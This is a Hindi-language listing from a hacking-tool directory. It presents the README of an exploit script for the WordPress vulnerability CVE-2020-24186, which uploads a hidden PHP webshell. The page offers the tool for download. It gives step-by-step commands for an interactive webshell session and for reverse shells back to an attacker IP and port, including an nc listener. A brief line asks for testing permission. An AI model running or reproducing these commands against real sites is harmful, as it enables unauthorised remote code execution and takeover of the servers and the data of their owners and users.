Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-24186 — CVE-2020-24186 के लिए WordPress में एक्सप्लॉइट स्क्रिप्ट जो एक छिपा हुआ PHP वेबशेल अपलोड करती है और वैकल्पिक pwntools लिसनर ऑटोमेशन के साथ इंटरैक्टिव या रिवर्स शेल एक्सेस प्रदान करती है। | Kitploit
उपकरण/GitHubGitHub/gazettel/cve-2020-24186
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubgazettel/cve-2020-24186

CVE-2020-24186

CVE-2020-24186 के लिए WordPress में एक्सप्लॉइट स्क्रिप्ट जो एक छिपा हुआ PHP वेबशेल अपलोड करती है और वैकल्पिक pwntools लिसनर ऑटोमेशन के साथ इंटरैक्टिव या रिवर्स शेल एक्सेस प्रदान करती है।

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-24186

यह स्क्रिप्ट WordPress में CVE-2020-24186 कमजोरी का शोषण करके एक छिपे हुए PHP पेलोड को अपलोड करती है और लक्ष्य प्रणाली पर एक शेल प्राप्त करती है। इसके तीन ऑपरेशन मोड हैं:

  1. इंटरैक्टिव शेल:
    बुनियादी वेबशेल अपलोड करता है और एक इंटरैक्टिव मोड में प्रवेश करता है, जिससे आप cmd पैरामीटर के माध्यम से कमांड भेज सकते हैं।

  2. मैनुअल रिवर्स शेल:
    वेबशेल अपलोड करता है और रिवर्स शेल पेलोड भेजता है, लेकिन स्वचालित रूप से लिसनर शुरू नहीं करता है। आपको निर्दिष्ट IP और पोर्ट पर अपना लिसनर स्वयं शुरू करना होगा।

  3. pwntools के साथ रिवर्स शेल:
    वेबशेल अपलोड करता है, रिवर्स शेल पेलोड भेजता है, और स्क्रिप्ट स्वचालित रूप से pwntools का उपयोग करके एक लिसनर शुरू करती है ताकि रिवर्स कनेक्शन कैप्चर हो सके।

आवश्यकताएँ

  • Python 3.x
  • Python लाइब्रेरीज़:
    • requests
    • pwn (pwntools)
  • (वैकल्पिक) प्रॉक्सी कॉन्फ़िगरेशन यदि आप ट्रैफ़िक को रूट करना चाहते हैं (जैसे, Burp Suite के साथ परीक्षण के लिए)।

उपयोग विकल्प

  • --url: लक्ष्य साइट का बेस URL (जैसे, )।
http://10.10.110.119
  • --blogpath: पोस्ट का पथ (डिफ़ॉल्ट: /?page=1)।
  • --mode: ऑपरेशन का मोड, या तो interactive या reverse।
  • --lhost: रिवर्स शेल के लिए स्थानीय IP (रिवर्स मोड में आवश्यक)।
  • --lport: रिवर्स शेल के लिए स्थानीय पोर्ट (रिवर्स मोड में आवश्यक)।
  • --reverse_method: रिवर्स शेल विधि: bash, nc, या python (डिफ़ॉल्ट bash है)।
  • --manual: जब रिवर्स मोड में उपयोग किया जाता है, तो स्क्रिप्ट लिसनर शुरू नहीं करेगी; आपको अपना लिसनर स्वयं शुरू करना होगा।
  • --use-proxy: यदि सेट किया जाता है, तो अनुरोध कॉन्फ़िगर किए गए प्रॉक्सी के माध्यम से भेजे जाएंगे।
  • उदाहरण

    1. इंटरैक्टिव शेल

    वेबशेल अपलोड करें और कमांड भेजने के लिए एक इंटरैक्टिव सत्र शुरू करें:

    root@kitploit:~
    python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy
    

    2. मैनुअल मोड में रिवर्स शेल

    वेबशेल अपलोड करें, रिवर्स शेल पेलोड भेजें, लेकिन स्वचालित रूप से लिसनर शुरू न करें। अपना लिसनर स्वयं शुरू करें (जैसे, netcat का उपयोग करके):

    root@kitploit:~
    python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy
    

    फिर, दूसरे टर्मिनल में, अपना लिसनर मैन्युअल रूप से शुरू करें:

    root@kitploit:~
    nc -lvnp 9002
    

    3. pwntools के साथ रिवर्स शेल

    वेबशेल अपलोड करें, रिवर्स शेल पेलोड भेजें, और स्क्रिप्ट को pwntools के साथ स्वचालित रूप से एक लिसनर शुरू करने दें ताकि कनेक्शन कैप्चर हो सके:

    root@kitploit:~
    python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy
    

    स्क्रिप्ट 10.10.1.1:9002 पर कनेक्शन की प्रतीक्षा करेगी और, एक बार कनेक्ट होने पर, एक इंटरैक्टिव शेल प्रदान करेगी।

    नोट्स

    • सुनिश्चित करें कि लक्ष्य साइट CVE-2020-24186 के प्रति संवेदनशील है और आपके पास सुरक्षा परीक्षण के लिए आवश्यक अनुमतियाँ हैं।
    • यदि आवश्यक हो, तो आप --php_payload विकल्प का उपयोग करके PHP पेलोड को संशोधित कर सकते हैं।
    • यदि आप --use-proxy फ्लैग का उपयोग करते हैं, तो प्रॉक्सी सेटिंग्स की दोबारा जाँच करें।
    टूल डाउनलोड करें